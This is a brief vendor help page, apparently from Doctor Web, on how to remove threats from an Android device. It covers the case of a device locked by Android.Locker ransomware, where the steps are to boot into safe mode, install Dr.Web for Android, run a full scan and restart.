Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android